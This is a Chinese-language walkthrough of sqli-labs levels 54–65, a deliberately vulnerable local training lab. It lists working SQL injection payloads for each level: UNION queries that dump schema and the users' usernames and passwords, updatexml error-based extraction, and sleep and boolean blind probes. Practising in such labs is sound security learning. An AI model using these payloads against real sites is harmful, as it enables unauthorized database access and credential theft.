Sql-labs 第54 - 65关 通过笔记（完）

第54关
http://127.0.0.1/sqllab/Less-54/?id=1'    报错
http://127.0.0.1/sqllab/Less-54/?id=1'--+     没报错，正常
闭合 ： '
http://127.0.0.1/sqllab/Less-54/?id=-1%27%20%20union%20select%201,2,3--+
发现2，3 有数据
爆数据库:
http://127.0.0.1/sqllab/Less-54/?id=-1%27%20%20union%20select%201,2,database()--+
爆表:
http://127.0.0.1/sqllab/Less-54/?id=-1%27%20%20union%20select%201,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆列:
http://127.0.0.1/sqllab/Less-54/?id=-1%27%20%20union%20select%201,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
爆数据
http://127.0.0.1/sqllab/Less-54/?id=-1' union select 1,group_concat(password),group_concat(username) from security.users--+

第55关
发现为数字型
试试union联动注入
试了一大堆payload，发现数字型好像没用？？
再看看什么闭合可以
发现 ) 可以
试试
http://127.0.0.1/sqllab/Less-54/?id=-1)%20%20union%20select%201,2,3--+
2,3回显
其他跟第54关一样
只不过数据改了，需要换一下

第56关
闭合换成 ')，其他跟54一样

第57关
闭合换成 “，其他跟54一样

第58关
闭合 ： ?id=1' --+
union联合注入
?id=-1' union select 1,2,3--+
页面正常，没用回显
报错盲注
?id=1'and  updatexml(1,concat(0x5e,(substr((database()),1)),0x5e),1) --+
成功爆表
?id=1'and  updatexml(1,concat(0x5e,(substr((换成select语句),1)),0x5e),1) --+

第59关
闭合为数字型，不需要闭合
爆库:
http://127.0.0.1/sqllab/Less-59/index.php/?id=1 and updatexml(1,concat(0x5e,(substr((database()),1)),0x5e),1)
爆其他
http://127.0.0.1/sqllab/Less-59/index.php/?id=1 and updatexml(1,concat(0x5e,(substr((注入select语句),1)),0x5e),1)

第60关
发现为 ") 闭合
爆库:
http://127.0.0.1/sqllab/Less-60/index.php/?id=1")and updatexml(1,concat(0x5e,(substr((database()),1)),0x5e),1)--+
爆其他
http://127.0.0.1/sqllab/Less-60/index.php/?id=1")and updatexml(1,concat(0x5e,(substr((注入select语句),1)),0x5e),1)--+

第61关
闭合为 ')) 闭合
爆库:
http://127.0.0.1/sqllab/Less-61/index.php/?id=1%27))and%20%20updatexml(1,concat(0x5e,(substr((database()),1)),0x5e),1)%20--+
爆其他
http://127.0.0.1/sqllab/Less-61/index.php/?id=1'))and updatexml(1,concat(0x5e,(substr((注入select语句),1)),0x5e),1)--+

第62关
看到130次，应该是时间或者bool盲注
http://127.0.0.1/sqllab/Less-62/?id=1%27)and%20sleep(8)--+
发现闭合为 ') ，加上 and sleep(8) --+
发现明显时间延迟，可以时间盲注
http://127.0.0.1/sqllab/Less-62/?id=1%27)and%20length(database())>1--+
http://127.0.0.1/sqllab/Less-62/?id=1%27)and%20length(database())=1--+
页面变化，有bool盲注
可以确定，有时间和bool
接下来自己慢慢来吧。。

第63关
http://127.0.0.1/sqllab/Less-63/?id=1‘--+
http://127.0.0.1/sqllab/Less-63/?id=1’
页面变化，闭合为 '
http://127.0.0.1/sqllab/Less-63/?id=1%27and%20sleep(8)--+
发现页面延迟明显，有时间
http://127.0.0.1/sqllab/Less-63/?id=1%27and(length(database())>1)--+
http://127.0.0.1/sqllab/Less-63/?id=1%27and%20length(database())=1--+
发现页面变化，有bool
sqlmap跑吧

第64关
发现为 )) 闭合
http://127.0.0.1/sqllab/Less-64/?id=1))and%20sleep(8)--+
发现页面延迟明显，有时间
http://127.0.0.1/sqllab/Less-64/?id=1))and(length(database())>1)--+
http://127.0.0.1/sqllab/Less-64/?id=1))and%20length(database())=1--+
发现页面变化，有bool
sqlmap跑吧

第65关
跟64几乎一样，闭合变成 ")